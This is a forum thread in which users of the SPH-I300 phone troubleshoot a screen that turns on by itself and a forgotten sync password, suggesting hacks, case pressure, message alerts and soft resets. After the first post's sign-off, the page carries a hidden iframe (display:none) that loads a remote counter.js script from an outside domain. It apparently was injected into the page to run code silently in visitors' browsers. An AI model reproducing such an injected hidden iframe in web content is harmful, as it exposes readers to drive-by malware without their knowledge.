Unhappy Screen always turning on by self in addition to password problem.

I recently let my battery power run out on my SPH-I300 and got a car charger to charge it back up since my desktop charger was in the office. Well since that point of recharging with the car charger, my screen keeps automatically turning on without my intervention. Is there a setting on the phone that may have changed on its own?

In addition, now when i sync it is asking for a password which was the last 4 digits of my phone before. I have tried all options of my phone number and nothing is working. Has this happened to anyone else, and if so, do you know the remedy?

Thanks,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

need more info...

have you installed any hacks form pda apps or anyone that deals with the screen?

what "general" hacks (if any) do you have installed?

as for the password, try your last four digits of your ssn, your cell number, "0000", or look on the box the phone came in.. could be a number there...

quite coincidentally

as of today i am experiencing a similar sympton whereby my screen comes on automatically. even if i turn it off, appx. 1 minute later it comes on! as far as what is different today versus the last 4 months of ownership: i installed Basejet (which is incredibly nice to access MS Outlook/Exchange btw) and i removed eudora mail.
thats it, I use no hacks, battery is full, have reset the I300 for grins, but I do have X-Master hack manager installed (which has been installed now for 3 months) . . .

This may not be the solution to your problem, but I would like to share my similar experience.
A few weeks ago, I noticed that EVERY TIME I turned off my phone and closed the case (the original one that came with the phone), the screen would turn back on. Turns out that the flexible spine of the case bulges inward when I close the case. It ends up hitting one of the right-side buttons (which turns the phone on). It took some work to get it to stop, but I finally did (I just distressed the leather long enough to make it less rigid).

I sometimes have the same problem as well. Sometimes it'll start doing it after I put it on the charger. Sometimes it won't. It's weird. I'll turn it off, then it'll come back on. What I do to get rid of it is just do a soft reset and it'll go away.

I have Basejet, X-master, logohack, graffitihack, keyboardhack, and multihack installed. The problem is not BIG, but it's weird. What do you guys think it is?

How about text messaging? Do you guys with the screen problem receive a lot of messages (this also applies to any message indication, voice or web)? If you receive a message alert and have the message auto pop-up "feature" turned off, then you might be suprised to see your screen turning on without any other indication every time a new message arrives. I found this to be an issue with my phone when I was looking for a way to disable the message audio alert. The only thing I accomplished by turning off the message pop-up dialog box was waste time while tapping more to get to the message.

I may be way off, but I thought I would help.

Recently i've been receiving a lot of text messages due to my subscription to the AIM Forwards, but even before I signed on to that, it was still doing it. So I doubt it is that. It might be AOL or Basejet. Who knows.
